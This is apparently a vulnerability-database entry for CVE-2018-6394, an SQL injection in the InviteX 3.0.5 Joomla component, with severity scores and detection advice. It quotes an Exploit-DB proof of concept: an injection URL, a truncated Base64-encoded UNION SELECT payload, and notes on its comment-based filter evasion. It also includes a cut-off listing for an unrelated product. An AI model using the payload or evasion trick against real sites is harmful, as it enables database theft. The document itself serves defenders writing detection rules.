CVE-2018-6394
Published 2018-02-17
CVE-2018-6394: SQL Injection exists in the InviteX 3.0.5 component for Joomla! via the invite_type parameter in a view=invites action.
Priority: P2 (64) · critical 9.8 (CVSS 3.0)
AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
Exploit: public (Exploit-DB)
EPSS: 2.70% (84.1th percentile)
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| techjoomla | invitex | — | — |
Detection & IOCs (extracted from sources)
URL: http://localhost/[PATH]/index.php?option=com_invitex&view=invites&invite_type=[SQL]&invite_anywhere=1
- Monitor HTTP requests targeting the Joomla component com_invitex with view=invites and a suspicious invite_type value (SQL metacharacters, comment openers such as /*!, or encoded payloads).
- Alert on requests carrying both option=com_invitex and view=invites, especially when invite_type contains URL-encoded SQL injection sequences or unusual characters.
- The PoC stores its payload Base64-encoded. The decoded string is itself URL-encoded and wraps the keywords in MySQL version comments (/*!13337UNION*/ /*!13337SELECT*/ 1,2,3,...), so a naive "UNION SELECT" match misses it. Base64-decode and URL-decode invite_type values, strip /*! ... */ wrappers, and then look for UNION SELECT or CONCAT_WS.
- The vulnerable component is specifically InviteX 3.0.5 for Joomla!; scope WAF/IDS rules to this component (option=com_invitex) to avoid false positives on other Joomla components. The installed version is not visible in the request, so confirm it on the host before treating a hit as exploitation.
- The PoC URL uses localhost as a placeholder; in real attacks the host varies. Detection rules should match on the query-string parameters (option=com_invitex, view=invites, invite_type) regardless of host.
CVSS provenance
NVD, CVSS v3.0: 9.8 CRITICAL (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
NVD, CVSS v2.0: 7.5 HIGH (AV:N/AC:L/Au:N/C:P/I:P/A:P)
No detection rules found.
Exploit-DB
Mongo Web Admin 6.0 - Information Disclosure
exploitdb · 2018-11-05
(This listing covers a different product and is tagged "CVE: N/A" below; it is not an exploit for CVE-2018-6394.)
---
# Exploit Title: Mongo Web Admin 6.0 - Information Disclosure
# Dork: N/A
# Date: 2018-11-04
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://www.mongoadmin.org/
# Software Link: https://netix.dl.sourceforge.net/project/mongo-web-admin/mongoDesktopAdminSetup-beta-6.exe
# Version: 6.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# Status/Protocol/Local host/Local port/Remote host/Remote port/PID/Process name
# Established/TCP/127.0.0.1/6376/127.0.0.1/6393/4520/mongoDesktopAdmin
# Established/TCP/127.0.0.1/6376/127.0.0.1/6394/4520/mongoDesktopAdmin
# Established/TCP/127.0.0.1/6393/127.0.0.1/6376/4520/mongoDesktopAdmin
# Established/TCP/127.0.0.1/6394/127.0.0.1/6376/4520/mongoDesktopAdmin
GET /test.
Exploit-DB
Joomla! Component InviteX 3.0.5 - 'invite_type' SQL Injection
exploitdb · 2018-02-16 · CVSS 9.8 · CVE-2018-6394 [CRITICAL]
---
# # # #
# Exploit Title: Joomla! Component InviteX 3.0.5 - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor Homepage: http://techjoomla.com/
# Software Link: https://extensions.joomla.org/extensions/extension/content-sharing/bookmark-a-recommend/invitex/
# Version: 3.0.5
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-6394
# # # #
# Exploit Author: Ihsan Sencan
# # # #
#
# POC:
#
# 1)
# http://localhost/[PATH]/index.php?option=com_invitex&view=invites&invite_type=[SQL]&invite_anywhere=1
#
# JTJkJTM4JTM3JTM3JTM4JTIwJTIwJTJmJTJhJTIxJTMxJTMzJTMzJTMzJTM3JTU1JTRlJTQ5JTRmJTRlJTJhJTJmJTIwJTJmJTJhJTIxJTMxJTMzJTMzJTMzJTM3JTUzJTQ1JTRjJTQ1JTQzJTU0JTJhJTJmJTIwJTMxJTJjJTMyJTJjJTMzJTJjJTM0JTJjJTM1JTJjJTM2JTJ
No writeups or analysis indexed.
Published: 2018-02-17